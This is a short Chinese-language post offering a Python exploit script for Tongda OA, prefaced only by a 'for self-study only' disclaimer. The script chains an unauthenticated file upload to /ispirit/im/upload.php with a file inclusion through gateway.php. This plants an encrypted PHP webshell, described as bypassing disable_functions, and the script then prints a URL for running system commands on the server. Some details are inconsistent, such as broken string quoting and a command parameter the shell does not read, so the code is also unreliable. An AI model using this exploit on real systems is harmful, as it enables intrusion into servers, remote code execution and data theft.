通达OA任意文件上传、文件包含、RCE——EXP

声明：工具仅供自我学习使用！切勿用于其他非法用途！用于非法用途与本人无关！！！

import os
import requests

# 定义webshell，因为是包含，所以用写入马比较方便
# 这个马自带bypass disable_function 功能
shell = ‘‘‘<?php
$fp = fopen(‘readm.php‘, ‘w+‘);
$a = <?php session_start();isset($_GET[‘pass‘])?print $_SESSION[‘k‘]=substr(md5(uniqid(rand())),16):($b=explode(‘|‘,openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION[‘k‘])))&$b[0]($b[1]);?>;
fwrite($fp, urldecode($a));
fclose($fp);
?>
‘‘‘

# 输入目标
url = input("input the TARGET(example:[url]https://127.0.0.1:1080[/url])>")
# 定义上传目录和包含目录
upload_url = url+"/ispirit/im/upload.php"
include_url = url+"/ispirit/interface/gateway.php"
# 定义shell目录，如果要修改名字，需要把shell里面的一起改了
shell_url = url+"/ispirit/interface/readm.php"
files = {‘ATTACHMENT‘: shell}
# 参见源码，有漏洞的版本只要POST P和DEST_UID参数就会自动生成session
upload_data = {"P": "123", "DEST_UID": "1", "UPLOAD_MODE": "2"}
# 上传
upload_res = requests.post(upload_url, upload_data, files=files)
# 此时会返回上传文件的路径
path = upload_res.text
# 解析返回值获取上传地址
path = path[path.find(‘@‘)+1:path.rfind(‘|‘)
            ].replace("_", "\/").replace("|", ".")
# 由于上传文件会自动改为jpg，所以要用gateway.php包含
include_data = {"json": "{\"url\":\"/general/../../attach/im/" + path+"\"}"}
# 包含+自动写入shell
include_res = requests.post(include_url, data=include_data)
# 返回结果 a参数可以直接填入系统命令（比如whoami），默认是system权限
print(‘shell is here:‘+shell_url+‘?a=command‘)